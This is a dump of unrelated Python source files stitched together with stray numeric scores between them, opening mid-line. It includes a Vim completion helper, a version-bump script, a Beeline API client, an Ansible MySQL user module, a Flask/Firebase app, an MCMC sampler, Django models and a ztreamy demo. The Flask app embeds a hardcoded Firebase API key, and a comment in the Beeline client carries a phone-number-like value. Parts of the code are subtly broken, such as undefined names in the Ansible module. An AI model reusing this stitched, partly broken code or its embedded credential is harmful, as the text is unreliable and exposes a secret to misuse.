line, current_column, filetype ) != current_column )
def AdjustCandidateInsertionText( candidates ):
"""This function adjusts the candidate insertion text to take into account the
text that's currently in front of the cursor.
For instance ('|' represents the cursor):
1. Buffer state: 'foo.|bar'
2. A completion candidate of 'zoobar' is shown and the user selects it.
3. Buffer state: 'foo.zoobar|bar' instead of 'foo.zoo|bar' which is what the
user wanted.
This function changes candidates to resolve that issue.
It could be argued that the user actually wants the final buffer state to be
'foo.zoobar|' (the cursor at the end), but that would be much more difficult
to implement and is probably not worth doing.
"""
def NewCandidateInsertionText( to_insert, text_after_cursor ):
overlap_len = OverlapLength( to_insert, text_after_cursor )
if overlap_len:
return to_insert[ :-overlap_len ]
return to_insert
text_after_cursor = vimsupport.TextAfterCursor()
if not text_after_cursor:
return candidates
new_candidates = []
for candidate in candidates:
if isinstance( candidate, dict ):
new_candidate = candidate.copy()
if 'abbr' not in new_candidate:
new_candidate[ 'abbr' ] = new_candidate[ 'word' ]
new_candidate[ 'word' ] = NewCandidateInsertionText(
new_candidate[ 'word' ],
text_after_cursor )
new_candidates.append( new_candidate )
elif isinstance( candidate, str ) or isinstance( candidate, bytes ):
new_candidates.append(
{ 'abbr': candidate,
'word': NewCandidateInsertionText( candidate, text_after_cursor ) } )
return new_candidates
def OverlapLength( left_string, right_string ):
"""Returns the length of the overlap between two strings.
Example: "foo baro" and "baro zoo" -> 4
"""
left_string_length = len( left_string )
right_string_length = len( right_string )
if not left_string_length or not right_string_length:
return 0
# Truncate the longer string.
if left_string_length > right_string_length:
left_string = left_string[ -right_string_length: ]
elif left_string_length < right_string_length:
right_string = right_string[ :left_string_length ]
if left_string == right_string:
return min( left_string_length, right_string_length )
# Start by looking for a single character match
# and increase length until no match is found.
best = 0
length = 1
while True:
pattern = left_string[ -length: ]
found = right_string.find( pattern )
if found < 0:
return best
length += found
if left_string[ -length: ] == right_string[ :length ]:
best = length
length += 1
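# Illustrative checks (added; they mirror the docstring example above):
#   OverlapLength('foo baro', 'baro zoo')  # -> 4, the overlap is 'baro'
#   OverlapLength('abcde', 'deabc')        # -> 2, only the suffix 'de' matches
#   OverlapLength('abc', 'xyz')            # -> 0, no overlap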
| 0.025299 |
#!/usr/bin/env python
# Copyright (c) 2013 Intel Corporation. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
increment-version.py -- Bump Beta or Canary version number across all required
files.
Crosswalk's versioning schema is "MAJOR.MINOR.BUILD.PATCH". Incrementing a beta
version will monotonically increase the PATCH number, while incrementing a
canary version will monotonically increase the BUILD number.
"""
import optparse
import os
import re
import sys
def PathFromRoot(path):
"""
Returns the absolute path to |path|, which is supposed to be relative to the
repository's root directory.
"""
return os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', path)
def IncrementVersions(replacements):
"""
|replacements| is a dictionary whose keys are files (relative to the root of
the repository) and values are regular expresions that match a section in the
file with the version number we want to increase.
The regular expression is expected to have 2 groups, the first matching
whatever precedes the version number and needs to stay the same, and the
second matching the number itself.
Each of the files specified will be overwritten with new version numbers.
"""
for path, regexp in replacements.iteritems():
# The paths are always relative to the repository's root directory.
path = PathFromRoot(path)
def _ReplacementFunction(match_obj):
version_number = int(match_obj.group(2))
return '%s%s' % (match_obj.group(1), version_number + 1)
    with open(path) as input_file:
      contents = re.sub(regexp, _ReplacementFunction, input_file.read())
    with open(path, 'w') as output_file:
      output_file.write(contents)
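# Worked example of the substitution above (added; file contents hypothetical):
#   re.sub(r'(PATCH=)(\d+)',
#          lambda m: '%s%s' % (m.group(1), int(m.group(2)) + 1),
#          'MAJOR=1\nPATCH=7')
#   # -> 'MAJOR=1\nPATCH=8'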
def Main():
option_parser = optparse.OptionParser()
option_parser.add_option(
'', '--type', choices=('beta', 'canary'), dest='release_type',
help='What part of the version number must be increased. \"beta\" '
'increases the patch version, \"canary\" increases the build '
'version.')
options, _ = option_parser.parse_args()
if options.release_type == 'beta':
replacements = {
'VERSION': r'(PATCH=)(\d+)',
'packaging/crosswalk.spec': r'(Version:\s+\d+\.\d+\.\d+\.)(\d+)',
}
IncrementVersions(replacements)
elif options.release_type == 'canary':
replacements = {
'VERSION': r'(BUILD=)(\d+)',
'packaging/crosswalk.spec': r'(Version:\s+\d+\.\d+\.)(\d+)',
}
IncrementVersions(replacements)
else:
print '--type is a required argument and has not been specified. Exiting.'
return 1
return 0
if __name__ == '__main__':
sys.exit(Main())
| 0.005303 |
import requests
LOGIN = ''
PASSWORD = ''
is_stub = True
def get_beeline_token():
"""
По логину и паролю по api beeline получаем токен билайна
пример токена 51BF96B928C8C71124BE61C1BF787B23
"""
    # The API base URL was redacted in the original source; keep the stub but
    # give each credential its own placeholder so the format call is valid.
    url = '=%s=%s' % (LOGIN, PASSWORD)
res = requests.get(url)
try:
res = res.json()
if res['meta']['code'] == 20000:
beeline_token = res['token']
return beeline_token, ""
else:
return None, res['meta']['message']
except Exception:
return None, "Error_%s" % res.status_code
def get_subscriptions(ctn):
bt, _ = get_beeline_token()
if is_stub:
url = 'http://127.0.0.1:5050/get'
else:
url = '=%s' % ctn
cookies = {'token': bt}
response = requests.get(url, cookies=cookies)
try:
response = response.json()
if response.get('meta').get('code') == 20000:
subscribes_list = response.get('subscriptions')
if len(subscribes_list) == 0:
result = "Подписок нет"
return result, None
else:
result = subscribes_list
return result, None
else:
result = response.get('meta').get('message')
return None, result
except Exception:
return None, "Error_%s" % response.status_code
# https://my.beeline.ru/api/1.0/info/serviceAvailableList?ctn=9060447044
def get_available_subscriptions(): pass
def remove_subscriptions(ctn, subscription_id):
bt, _ = get_beeline_token()
if is_stub:
url = 'http://127.0.0.1:5050/remove?subscriptionId=%s' % subscription_id
else:
url = '={}&subscriptionId={}'.format(ctn, subscription_id)
cookies = {'token': bt}
response = requests.get(url, cookies=cookies)
response = response.json()
if response.get('meta').get('code') == 20000:
        result = 'Will be switched off soon, refresh the page'
else:
result = response.get('meta').get('message')
return result
if __name__ == '__main__':
    ctn = ''
    # The original demo called undefined helpers (get_token, get_personal_info);
    # exercise the functions defined in this module instead.
    token, error = get_beeline_token()
    print(token or error)
    subscriptions, error = get_subscriptions(ctn)
    print(subscriptions or error)
| 0.000905 |
#!/usr/bin/python
# (c) 2012, Mark Theunissen <[email protected]>
# Sponsored by Four Kitchens http://fourkitchens.com.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: mysql_user
short_description: Adds or removes a user from a MySQL database.
description:
- Adds or removes a user from a MySQL database.
version_added: "0.6"
options:
name:
description:
- name of the user (role) to add or remove
required: true
password:
description:
- set the user's password. (Required when adding a user)
required: false
default: null
host:
description:
- the 'host' part of the MySQL username
required: false
default: localhost
login_user:
description:
- The username used to authenticate with
required: false
default: null
login_password:
description:
- The password used to authenticate with
required: false
default: null
login_host:
description:
- Host running the database
required: false
default: localhost
login_port:
description:
- Port of the MySQL server
required: false
default: 3306
version_added: '1.4'
login_unix_socket:
description:
- The path to a Unix domain socket for local connections
required: false
default: null
priv:
description:
- "MySQL privileges string in the format: C(db.table:priv1,priv2)"
required: false
default: null
append_privs:
description:
- Append the privileges defined by priv to the existing ones for this
user instead of overwriting existing ones.
required: false
choices: [ "yes", "no" ]
default: "no"
version_added: "1.4"
state:
description:
- Whether the user should exist. When C(absent), removes
the user.
required: false
default: present
choices: [ "present", "absent" ]
check_implicit_admin:
description:
- Check if mysql allows login as root/nopassword before trying supplied credentials.
required: false
choices: [ "yes", "no" ]
default: "no"
version_added: "1.3"
update_password:
required: false
default: always
choices: ['always', 'on_create']
version_added: "2.0"
description:
- C(always) will update passwords if they differ. C(on_create) will only set the password for newly created users.
config_file:
description:
- Specify a config file from which user and password are to be read
required: false
default: '~/.my.cnf'
version_added: "2.0"
notes:
- Requires the MySQLdb Python package on the remote host. For Ubuntu, this
is as easy as apt-get install python-mysqldb.
- Both C(login_password) and C(login_user) are required when you are
passing credentials. If none are present, the module will attempt to read
the credentials from C(~/.my.cnf), and finally fall back to using the MySQL
default login of 'root' with no password.
- "MySQL server installs with default login_user of 'root' and no password. To secure this user
as part of an idempotent playbook, you must create at least two tasks: the first must change the root user's password,
without providing any login_user/login_password details. The second must drop a ~/.my.cnf file containing
the new root credentials. Subsequent runs of the playbook will then succeed by reading the new credentials from
the file."
requirements: [ "MySQLdb" ]
author: "Mark Theunissen (@marktheunissen)"
'''
EXAMPLES = """
# Create database user with name 'bob' and password '12345' with all database privileges
- mysql_user: name=bob password=12345 priv=*.*:ALL state=present
# Creates database user 'bob' and password '12345' with all database privileges and 'WITH GRANT OPTION'
- mysql_user: name=bob password=12345 priv=*.*:ALL,GRANT state=present
# Modify user Bob to require SSL connections. Note that REQUIRESSL is a special privilege that should only apply to *.* by itself.
- mysql_user: name=bob append_privs=true priv=*.*:REQUIRESSL state=present
# Ensure no user named 'sally' exists, also passing in the auth credentials.
- mysql_user: login_user=root login_password=123456 name=sally state=absent
# Specify grants composed of more than one word
- mysql_user: name=replication password=12345 priv=*.*:"REPLICATION CLIENT" state=present
# Revoke all privileges for user 'bob' and password '12345'
- mysql_user: name=bob password=12345 priv=*.*:USAGE state=present
# Example privileges string format
mydb.*:INSERT,UPDATE/anotherdb.*:SELECT/yetanotherdb.*:ALL
# Example using login_unix_socket to connect to server
- mysql_user: name=root password=abc123 login_unix_socket=/var/run/mysqld/mysqld.sock
# Example .my.cnf file for setting the root password
[client]
user=root
password=n<_665{vS43y
"""
import getpass
import tempfile
import re
try:
import MySQLdb
except ImportError:
mysqldb_found = False
else:
mysqldb_found = True
VALID_PRIVS = frozenset(('CREATE', 'DROP', 'GRANT', 'GRANT OPTION',
'LOCK TABLES', 'REFERENCES', 'EVENT', 'ALTER',
'DELETE', 'INDEX', 'INSERT', 'SELECT', 'UPDATE',
'CREATE TEMPORARY TABLES', 'TRIGGER', 'CREATE VIEW',
'SHOW VIEW', 'ALTER ROUTINE', 'CREATE ROUTINE',
'EXECUTE', 'FILE', 'CREATE TABLESPACE', 'CREATE USER',
'PROCESS', 'PROXY', 'RELOAD', 'REPLICATION CLIENT',
'REPLICATION SLAVE', 'SHOW DATABASES', 'SHUTDOWN',
'SUPER', 'ALL', 'ALL PRIVILEGES', 'USAGE', 'REQUIRESSL'))
class InvalidPrivsError(Exception):
pass
# ===========================================
# MySQL module specific support methods.
#
def connect(module, login_user=None, login_password=None, config_file=''):
config = {
'host': module.params['login_host'],
'db': 'mysql'
}
if module.params['login_unix_socket']:
config['unix_socket'] = module.params['login_unix_socket']
else:
config['port'] = module.params['login_port']
if os.path.exists(config_file):
config['read_default_file'] = config_file
# If login_user or login_password are given, they should override the
# config file
if login_user is not None:
config['user'] = login_user
if login_password is not None:
config['passwd'] = login_password
db_connection = MySQLdb.connect(**config)
return db_connection.cursor()
def user_exists(cursor, user, host):
cursor.execute("SELECT count(*) FROM user WHERE user = %s AND host = %s", (user,host))
count = cursor.fetchone()
return count[0] > 0
def user_add(cursor, user, host, password, new_priv):
cursor.execute("CREATE USER %s@%s IDENTIFIED BY %s", (user,host,password))
if new_priv is not None:
for db_table, priv in new_priv.iteritems():
privileges_grant(cursor, user,host,db_table,priv)
return True
def user_mod(cursor, user, host, password, new_priv, append_privs):
changed = False
grant_option = False
# Handle passwords
if password is not None:
cursor.execute("SELECT password FROM user WHERE user = %s AND host = %s", (user,host))
current_pass_hash = cursor.fetchone()
cursor.execute("SELECT PASSWORD(%s)", (password,))
new_pass_hash = cursor.fetchone()
if current_pass_hash[0] != new_pass_hash[0]:
cursor.execute("SET PASSWORD FOR %s@%s = PASSWORD(%s)", (user,host,password))
changed = True
# Handle privileges
if new_priv is not None:
curr_priv = privileges_get(cursor, user,host)
# If the user has privileges on a db.table that doesn't appear at all in
# the new specification, then revoke all privileges on it.
for db_table, priv in curr_priv.iteritems():
# If the user has the GRANT OPTION on a db.table, revoke it first.
if "GRANT" in priv:
grant_option = True
if db_table not in new_priv:
if user != "root" and "PROXY" not in priv and not append_privs:
privileges_revoke(cursor, user,host,db_table,priv,grant_option)
changed = True
# If the user doesn't currently have any privileges on a db.table, then
# we can perform a straight grant operation.
for db_table, priv in new_priv.iteritems():
if db_table not in curr_priv:
privileges_grant(cursor, user,host,db_table,priv)
changed = True
# If the db.table specification exists in both the user's current privileges
# and in the new privileges, then we need to see if there's a difference.
db_table_intersect = set(new_priv.keys()) & set(curr_priv.keys())
for db_table in db_table_intersect:
priv_diff = set(new_priv[db_table]) ^ set(curr_priv[db_table])
if (len(priv_diff) > 0):
if not append_privs:
privileges_revoke(cursor, user,host,db_table,curr_priv[db_table],grant_option)
privileges_grant(cursor, user,host,db_table,new_priv[db_table])
changed = True
return changed
def user_delete(cursor, user, host):
cursor.execute("DROP USER %s@%s", (user, host))
return True
def privileges_get(cursor, user,host):
""" MySQL doesn't have a better method of getting privileges aside from the
SHOW GRANTS query syntax, which requires us to then parse the returned string.
Here's an example of the string that is returned from MySQL:
GRANT USAGE ON *.* TO 'user'@'localhost' IDENTIFIED BY 'pass';
This function makes the query and returns a dictionary containing the results.
The dictionary format is the same as that returned by privileges_unpack() below.
"""
output = {}
cursor.execute("SHOW GRANTS FOR %s@%s", (user, host))
grants = cursor.fetchall()
def pick(x):
if x == 'ALL PRIVILEGES':
return 'ALL'
else:
return x
for grant in grants:
res = re.match("GRANT (.+) ON (.+) TO '.*'@'.+'( IDENTIFIED BY PASSWORD '.+')? ?(.*)", grant[0])
if res is None:
raise InvalidPrivsError('unable to parse the MySQL grant string: %s' % grant[0])
privileges = res.group(1).split(", ")
privileges = [ pick(x) for x in privileges]
if "WITH GRANT OPTION" in res.group(4):
privileges.append('GRANT')
if "REQUIRE SSL" in res.group(4):
privileges.append('REQUIRESSL')
db = res.group(2)
output[db] = privileges
return output
def privileges_unpack(priv):
""" Take a privileges string, typically passed as a parameter, and unserialize
it into a dictionary, the same format as privileges_get() above. We have this
custom format to avoid using YAML/JSON strings inside YAML playbooks. Example
of a privileges string:
mydb.*:INSERT,UPDATE/anotherdb.*:SELECT/yetanother.*:ALL
The privilege USAGE stands for no privileges, so we add that in on *.* if it's
not specified in the string, as MySQL will always provide this by default.
"""
output = {}
privs = []
for item in priv.strip().split('/'):
pieces = item.strip().split(':')
dbpriv = pieces[0].rsplit(".", 1)
# Do not escape if privilege is for database '*' (all databases)
if dbpriv[0].strip('`') != '*':
pieces[0] = "`%s`.%s" % (dbpriv[0].strip('`'), dbpriv[1])
if '(' in pieces[1]:
output[pieces[0]] = re.split(r',\s*(?=[^)]*(?:\(|$))', pieces[1].upper())
for i in output[pieces[0]]:
privs.append(re.sub(r'\(.*\)','',i))
else:
output[pieces[0]] = pieces[1].upper().split(',')
privs = output[pieces[0]]
new_privs = frozenset(privs)
if not new_privs.issubset(VALID_PRIVS):
raise InvalidPrivsError('Invalid privileges specified: %s' % new_privs.difference(VALID_PRIVS))
if '*.*' not in output:
output['*.*'] = ['USAGE']
# if we are only specifying something like REQUIRESSL in *.* we still need
# to add USAGE as a privilege to avoid syntax errors
if priv.find('REQUIRESSL') != -1 and 'USAGE' not in output['*.*']:
output['*.*'].append('USAGE')
return output
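# Illustrative round trip (added): a privileges string and the dict it unpacks to.
#   privileges_unpack('mydb.*:INSERT,UPDATE/anotherdb.*:SELECT')
#   # -> {'`mydb`.*': ['INSERT', 'UPDATE'],
#   #     '`anotherdb`.*': ['SELECT'],
#   #     '*.*': ['USAGE']}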
def privileges_revoke(cursor, user,host,db_table,priv,grant_option):
# Escape '%' since mysql db.execute() uses a format string
db_table = db_table.replace('%', '%%')
if grant_option:
query = ["REVOKE GRANT OPTION ON %s" % mysql_quote_identifier(db_table, 'table')]
query.append("FROM %s@%s")
query = ' '.join(query)
cursor.execute(query, (user, host))
priv_string = ",".join([p for p in priv if p not in ('GRANT', 'REQUIRESSL')])
query = ["REVOKE %s ON %s" % (priv_string, mysql_quote_identifier(db_table, 'table'))]
query.append("FROM %s@%s")
query = ' '.join(query)
cursor.execute(query, (user, host))
def privileges_grant(cursor, user,host,db_table,priv):
# Escape '%' since mysql db.execute uses a format string and the
# specification of db and table often use a % (SQL wildcard)
db_table = db_table.replace('%', '%%')
priv_string = ",".join([p for p in priv if p not in ('GRANT', 'REQUIRESSL')])
query = ["GRANT %s ON %s" % (priv_string, mysql_quote_identifier(db_table, 'table'))]
query.append("TO %s@%s")
if 'GRANT' in priv:
query.append("WITH GRANT OPTION")
if 'REQUIRESSL' in priv:
query.append("REQUIRE SSL")
query = ' '.join(query)
cursor.execute(query, (user, host))
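# Example of the statement assembled above (added; the names are hypothetical):
#   GRANT SELECT,INSERT ON `mydb`.* TO 'bob'@'localhost' WITH GRANT OPTION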
# ===========================================
# Module execution.
#
def main():
module = AnsibleModule(
argument_spec = dict(
login_user=dict(default=None),
login_password=dict(default=None),
login_host=dict(default="localhost"),
login_port=dict(default=3306, type='int'),
login_unix_socket=dict(default=None),
user=dict(required=True, aliases=['name']),
password=dict(default=None, no_log=True),
host=dict(default="localhost"),
state=dict(default="present", choices=["absent", "present"]),
priv=dict(default=None),
append_privs=dict(default=False, type='bool'),
check_implicit_admin=dict(default=False, type='bool'),
update_password=dict(default="always", choices=["always", "on_create"]),
config_file=dict(default="~/.my.cnf"),
)
)
login_user = module.params["login_user"]
login_password = module.params["login_password"]
user = module.params["user"]
password = module.params["password"]
host = module.params["host"].lower()
state = module.params["state"]
priv = module.params["priv"]
check_implicit_admin = module.params['check_implicit_admin']
config_file = module.params['config_file']
append_privs = module.boolean(module.params["append_privs"])
update_password = module.params['update_password']
config_file = os.path.expanduser(os.path.expandvars(config_file))
if not mysqldb_found:
module.fail_json(msg="the python mysqldb module is required")
if priv is not None:
try:
priv = privileges_unpack(priv)
except Exception, e:
module.fail_json(msg="invalid privileges string: %s" % str(e))
cursor = None
try:
if check_implicit_admin:
try:
cursor = connect(module, 'root', '', config_file)
except:
pass
if not cursor:
cursor = connect(module, login_user, login_password, config_file)
except Exception, e:
module.fail_json(msg="unable to connect to database, check login_user and login_password are correct or ~/.my.cnf has the credentials. Exception message: %s" % e)
if state == "present":
if user_exists(cursor, user, host):
try:
if update_password == 'always':
changed = user_mod(cursor, user, host, password, priv, append_privs)
else:
changed = user_mod(cursor, user, host, None, priv, append_privs)
except (SQLParseError, InvalidPrivsError, MySQLdb.Error), e:
module.fail_json(msg=str(e))
else:
if password is None:
module.fail_json(msg="password parameter required when adding a user")
try:
changed = user_add(cursor, user, host, password, priv)
except (SQLParseError, InvalidPrivsError, MySQLdb.Error), e:
module.fail_json(msg=str(e))
elif state == "absent":
if user_exists(cursor, user, host):
changed = user_delete(cursor, user, host)
else:
changed = False
module.exit_json(changed=changed, user=user)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.database import *
if __name__ == '__main__':
main()
| 0.005514 |
from flask import Flask
from flask import request
from flask import jsonify
import pyrebase
app = Flask(__name__)
config = {
"apiKey": "AIzaSyBXZpwPptJjUJddDl6Q0DpG_3k7mGDdHk8",
"authDomain": "my-first-project-fea9c.firebaseapp.com",
"databaseURL": "https://my-first-project-fea9c.firebaseio.com/",
"storageBucket": "my-first-project-fea9c.appspot.com"
}
firebase = pyrebase.initialize_app(config)
@app.route('/')
def hello_world():
return 'Hello, World!'
@app.route('/createuser')
def create_user():
    username = request.headers.get('email')
    password = request.headers.get('password')
    auth = firebase.auth()
    auth.create_user_with_email_and_password(username, password)
    # Flask views must return a response; a plain confirmation string suffices.
    return 'user created'
@app.route('/login')
def login():
    username = request.headers.get('email')
    password = request.headers.get('password')
    auth = firebase.auth()
    auth.sign_in_with_email_and_password(username, password)
    return 'logged in'
@app.route('/createlist')
def create_list():
owner = request.headers.get('owner')
list_name = request.headers.get('name')
db = firebase.database()
list_data = {
'owner': owner,
'name': list_name
}
resp = db.child("lists").push(list_data)
return resp["name"]
@app.route('/list')
def get_list():
list_id = request.headers.get('listID')
db = firebase.database()
data = db.child('lists').child(list_id).get()
    return jsonify(data.val())
| 0.004246 |
import numpy as np
from scipy.special import gammaln  # provides the log-gamma terms used below
def sample_distparams(F, dist_struct, hyperparams, hyperhyperparams, num_iters):
    # Ported from MATLAB:
    # function [hyperparams] = sample_distparams(F,dist_struct,hyperparams,hyperhyperparams,num_iters)
    numObj = len(dist_struct)
    Ki = np.zeros(numObj)
    sum_log_pi_kk = np.zeros(numObj)
    sum_log_pi_all = np.zeros(numObj)
    for ii in range(len(dist_struct)):
        Ki[ii] = np.sum(F[ii, :])
        # Port of the MATLAB logical indexing pi_z(F(ii,:),F(ii,:)): keep the
        # rows and columns of the transition matrix for the active features.
        mask = F[ii, :].astype(bool)
        pi_z_ii = dist_struct[ii].pi_z[np.ix_(mask, mask)]
        # Normalize each row into a probability distribution.
        pi_z_ii = pi_z_ii / pi_z_ii.sum(axis=1, keepdims=True)
        sum_log_pi_kk[ii] = np.sum(np.log(np.diag(pi_z_ii)))
        sum_log_pi_all[ii] = np.sum(np.log(pi_z_ii))
# Hyperparameters for prior on kappa:
a_kappa = hyperhyperparams.a_kappa
b_kappa = hyperhyperparams.b_kappa
# Variance of gamma proposal:
var_kappa = hyperhyperparams.var_kappa
# Hyperparameters for prior on alpha:
a_alpha = hyperhyperparams.a_alpha
b_alpha = hyperhyperparams.b_alpha
# Variance of gamma proposal:
var_alpha = hyperhyperparams.var_alpha
# Last value of alpha and kappa:
alpha0 = hyperparams.alpha0
kappa0 = hyperparams.kappa0
for nn in range(num_iters):
####### Sample kappa given alpha #######
# (a,b) hyperparameters of gamma prior based on fixed variance and setting
# mean equal to previous kappa value:
aa_kappa0 = (kappa0**2)/var_kappa
bb_kappa0 = kappa0/var_kappa
# Sample a proposed kappa:
        # np.random.gamma replaces the undefined helper randgamma.
        kappa = np.random.gamma(aa_kappa0) / bb_kappa0
# Determine log-likelihood of transition distributions given previous kappa
# value and proposed kappa value:
log_diff_f = 0
for ii in range(len(dist_struct)):
log_diff_f = log_diff_f + Ki[ii]*(gammaln(alpha0*Ki[ii]+kappa)-gammaln(alpha0*Ki[ii]+kappa0)) \
- Ki[ii]*(gammaln(alpha0+kappa)-gammaln(alpha0+kappa0)) + (kappa-kappa0)*sum_log_pi_kk[ii]
# Add in prior probability of previous and proposed kappa values:
log_diff_f = log_diff_f + (a_kappa-1)*(np.log(kappa)-np.log(kappa0))-(kappa-kappa0)*b_kappa
# (a,b) hyperparameters of gamma prior based on fixed variance and setting
# mean equal to proposed kappa value:
aa_kappa = (kappa**2)/var_kappa
bb_kappa = kappa/var_kappa
# Log accept-reject ratio:
log_rho = log_diff_f + (gammaln(aa_kappa0) - gammaln(aa_kappa)) \
+ (aa_kappa-aa_kappa0-1)*np.log(kappa0) - (aa_kappa0-aa_kappa-1)*np.log(kappa) \
+ (aa_kappa0-aa_kappa)*np.log(var_kappa)
        if np.isinf(log_rho):
            log_rho = -np.inf
rho = np.exp(log_rho)
if rho > 1:
kappa0 = kappa
else:
            sample_set = [kappa0, kappa]
            # 0-based indexing; the MATLAB original used 1 + (rand > (1-rho)).
            ind = int(np.random.rand() > (1 - rho))
            kappa0 = sample_set[ind]
####### Sample alpha given kappa #######
# (a,b) hyperparameters of gamma prior based on fixed variance and setting
# mean equal to previous alpha value:
aa_alpha0 = (alpha0**2)/var_alpha
bb_alpha0 = alpha0/var_alpha
# Sample a proposed alpha:
        alpha = np.random.gamma(aa_alpha0) / bb_alpha0
# Determine log-likelihood of transition distributions given previous alpha
# value and proposed alpha value:
log_diff_f = 0
for ii in range(len(dist_struct)):
log_diff_f = log_diff_f + Ki[ii]*(gammaln(alpha*Ki[ii]+kappa0)-gammaln(alpha0*Ki[ii]+kappa0)) \
- Ki[ii]*(gammaln(alpha+kappa0)-gammaln(alpha0+kappa0)) \
- Ki[ii]*(Ki[ii]-1)*(gammaln(alpha)-gammaln(alpha0)) \
+ (alpha-alpha0)*sum_log_pi_all[ii]
# Add in prior probability of previous and proposed alpha values:
log_diff_f = log_diff_f + (a_alpha-1)*(np.log(alpha)-np.log(alpha0))-(alpha-alpha0)*b_alpha
# (a,b) hyperparameters of gamma prior based on fixed variance and setting
# mean equal to proposed kappa value:
aa_alpha = (alpha**2)/var_alpha
bb_alpha = alpha/var_alpha
# Log accept-reject ratio:
log_rho = log_diff_f + (gammaln(aa_alpha0) - gammaln(aa_alpha)) \
+ (aa_alpha-aa_alpha0-1)*np.log(alpha0) - (aa_alpha0-aa_alpha-1)*np.log(alpha) \
+ (aa_alpha0-aa_alpha)*np.log(var_alpha)
        if np.isinf(log_rho):
            # -inf (not +inf) so that an overflowed ratio rejects, mirroring
            # the kappa step above.
            log_rho = -np.inf
rho = np.exp(log_rho)
if rho > 1:
alpha0 = alpha
else:
            sample_set = [alpha0, alpha]
            ind = int(np.random.rand() > (1 - rho))
            alpha0 = sample_set[ind]
# Write final values:
hyperparams.alpha0 = alpha0
hyperparams.kappa0 = kappa0
return hyperparams
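# Added sketch of the Metropolis-Hastings accept step used twice above: with
# acceptance ratio rho = exp(log_rho), the proposal is kept with probability
# min(1, rho):
#
#   accepted = proposal if np.random.rand() < min(1.0, rho) else current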
| 0.015055 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('taxbrain', '0013_auto_20141021_1346'),
]
operations = [
migrations.CreateModel(
name='AdjustmentsInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='AlternativeMinimumInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='CreditsInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='GrossIncomeInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='IncomeRatesInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ItemizedDeductionsInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='SocialSecurityInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='StandardDeductionsInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.RenameModel(
old_name='TaxSaveInputs',
new_name='PersonalExemptionsInputs',
),
]
| 0.002825 |
from __future__ import print_function
import time
import random
import ztreamy
import tornado.ioloop
# Create a server with two streams
server = ztreamy.StreamServer(9000)
# Create the streams; stream1 allows remote producers to publish through HTTP
stream1 = ztreamy.Stream('/stream1', allow_publish=True)
stream2 = ztreamy.Stream('/stream2')
server.add_stream(stream1)
server.add_stream(stream2)
# Create two publisher objects
publisher1 = ztreamy.LocalEventPublisher(stream1)
publisher2 = ztreamy.LocalEventPublisher(stream2)
source_id = ztreamy.random_id()
application_ids = ['ztreamy-example-a', 'ztreamy-example-b']
# Publish events periodically
def publish_hi():
print('Publishing "hi"')
app_id = random.choice(application_ids)
event = ztreamy.Event(source_id, 'text/plain', 'Hi', application_id=app_id)
publisher1.publish(event)
def publish_there():
print('Publishing "there"')
app_id = random.choice(application_ids)
event = ztreamy.Event(source_id, 'text/plain', 'there!',
application_id=app_id)
publisher2.publish(event)
tornado.ioloop.PeriodicCallback(publish_hi, 10000).start()
time.sleep(5)
tornado.ioloop.PeriodicCallback(publish_there, 10000).start()
try:
print('Starting the server')
server.start(loop=True)
except KeyboardInterrupt:
# Allow ctrl-c to close the server
pass
finally:
server.stop()
| 0.002141 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from autoslug import AutoSlugField
from django.db import models
from django.db.models import F
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from django.conf import settings
from django.utils import timezone
from .config import COMMENT_ACTION, COMMENT
class Category(models.Model):
"""
Category model
"""
parent = models.ForeignKey('self', verbose_name=_("category parent"), blank=True, null=True)
title = models.CharField(_("title"), max_length=75)
slug = AutoSlugField(populate_from="title", blank=True, unique=True)
description = models.CharField(_("description"), max_length=255, blank=True)
color = models.CharField(_("color"), max_length=7, blank=True,
help_text=_("Title color in hex format (i.e: #1aafd0)."))
is_global = models.BooleanField(_("global"), default=True,
help_text=_('Designates whether the topics will be'
'displayed in the all-categories list.'))
is_closed = models.BooleanField(_("closed"), default=False)
is_removed = models.BooleanField(_("removed"), default=False)
is_private = models.BooleanField(_("private"), default=False)
class Meta:
ordering = ['-pk']
verbose_name = _("category")
verbose_name_plural = _("categories")
    def __unicode__(self):
        # __unicode__ must return a unicode string, not UTF-8 encoded bytes.
        return self.title
def get_absolute_url(self):
return reverse(
'drf_spirit:category-detail',
kwargs={'pk': str(self.id), 'slug': self.slug})
@property
def is_subcategory(self):
if self.parent_id:
return True
else:
return False
class Topic(models.Model):
"""
Topic model
"""
user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='spirit_topics', editable=False)
